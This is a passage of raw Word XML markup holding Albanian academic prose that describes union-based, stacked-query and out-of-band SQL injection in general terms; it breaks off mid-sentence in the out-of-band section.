    <w:p w14:paraId="66098677" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167880F7" w14:textId="11C8574F" w:rsidR="000C31F5" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injektimi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bazuar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>në</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> union </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lejon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>një</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sulmues</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nxjerrë</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>informacion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nga</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>baza</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>të</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dhënave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> duke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>zgjeruar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rezultatet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kthyera</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nga</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pyetja</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>origjinale</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Operatori</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unionit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mund</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përdoret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vetëm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nëse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> query-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>të</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>origjinale</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>të</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reja</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kanë</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njëjtën</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strukturë</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>numri</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dhe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lloji</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</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dhënave</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kolonave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sulmuesi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>në</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>këtë</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mund</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nxjerrë</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>informatat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shumë</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shpejtë</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>për</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arsye</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mundsisë</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kombinimit</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shumë</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>komandave</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>në</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>një</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF sqlmap_UnionBased \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00717774">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="001427DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F82F44" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRPr="003A6E31" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773A0BA2" w14:textId="77777777" w:rsidR="000C31F5" w:rsidRPr="003A6E31" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc59567381"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Injektimi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A6E31">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Stacked queries and out-of-band</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="072DB0AA" w14:textId="77777777" w:rsidR="0003327A" w:rsidRDefault="0003327A" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283D8238" w14:textId="5E0F2C91" w:rsidR="000C31F5" w:rsidRPr="005016C7" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0003327A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stacked queries - </w:t>
      </w:r>
      <w:r w:rsidRPr="0003327A">
        <w:t xml:space="preserve">Një pikëpresje (;) përdoret për të përfunduar një statement në SQL. </w:t>
      </w:r>
      <w:r w:rsidRPr="005016C7">
        <w:t xml:space="preserve">Duke fshirë radhën origjinale dhe duke shtuar një të ri sulmuesi mund të ndryshoj të dhënat në bazën e të dhënave. Një pikëpresje lejon sulmuesin të ekzekutojë statements të shumta në bazën e të dhënave që ka ngjashmëri në sulmin e bazuar në Union. Injeksioni i bazuar në Union mund të bëhet vetëm duke përdorur statments SELECT, kurse te Stacked queries mund të bëhet me çfarëdo statements. Pra ky lloj i sulmit gjeneron një cenueshmëri të madhe të bazës së të dhënave. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F02023F" w14:textId="556FE859" w:rsidR="00EF2D7F" w:rsidRPr="00F579B2" w:rsidRDefault="000C31F5" w:rsidP="000C31F5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="00A92168">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ut-of-band</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>është</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shumë</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përdorur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>një</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ndër</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arsyet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kryesore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nuk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>përdoret</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>është</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sepse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>varet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00970CDC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
